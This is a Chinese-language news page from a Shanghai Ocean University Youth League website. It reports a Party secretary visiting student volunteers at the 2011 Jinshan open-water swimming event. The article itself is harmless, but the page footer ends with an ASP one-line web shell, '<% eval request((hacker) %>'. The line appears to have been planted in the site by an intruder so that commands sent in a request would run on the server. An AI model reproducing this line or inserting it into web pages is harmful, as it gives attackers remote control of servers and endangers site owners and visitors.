当前位置:共青团上海海洋大学委员会 >> 志愿服务 >> 志愿活动 >> 正文  
站内信息搜索:
校领导慰问我校金山公开水域比赛志愿者
[2011年10月10日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

   

                  

        722日,金山城市沙滩酷暑难耐,我校五十名竞赛部的志愿者在各自岗位挥汗如雨,努力践行志愿者我奉献、我参与、我快乐的精神,用实际行动服务赛 事,为城市添彩。

 

 

                 

 

                  

 

       上午9时,校党委书记虞丽娟在金山区副区长许复新、金山区体育局局长杨伟、金山区团区委书记庄健以及相关工作同志的陪同下慰问我校志愿者。

       虞书记首先来到信息台、检录处、补给站管理管理岗位,看望正在紧张工作的志愿者们。虞书记为在场的同学们发放慰问徽章,并与志愿者亲切交谈,了解志愿者工作情况,鼓励他们做好本职服务工作,为本次赛事工作做贡献,同时希望大家要在服务工作中总结经验,提炼收获。

       随后虞书记一行冒着酷暑来到户外服务岗位。在得知服务技术官员的志愿者以及在补给站服务的志愿者们时刻不能离岗,每天都必须接受烈日的考验时,虞书记叮嘱在外服务的同学们一定要注意防暑降温工作,注意休息,时刻保持好自己服务状态。虞书记亲切、真诚的话语使得在场的志愿者们倍受鼓舞,表示一定会更加努力,让更多的人们领略到我们海大志愿者的风采。

       截止目前,我校金山赛区50名竞赛部志愿者已经完满完成了包括信息台、检录处、FOP管理、船只码头管理、补给站管理管理、技术官员服务、FINA/VIP管理和水下侦测等多项任务,每一位志愿者都是海精灵,他们传承着我校世博志愿者精神,发扬着勤朴忠实的海大精神,以自身努力,为向母校的百年校庆献礼,向世界展现了我们当代青年志愿者的精神风貌!

 

关闭窗口

上一篇:团市委书记潘敏慰问我校世游赛金山公开水域志愿者

下一篇:我校世游赛志愿者工作获表彰
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>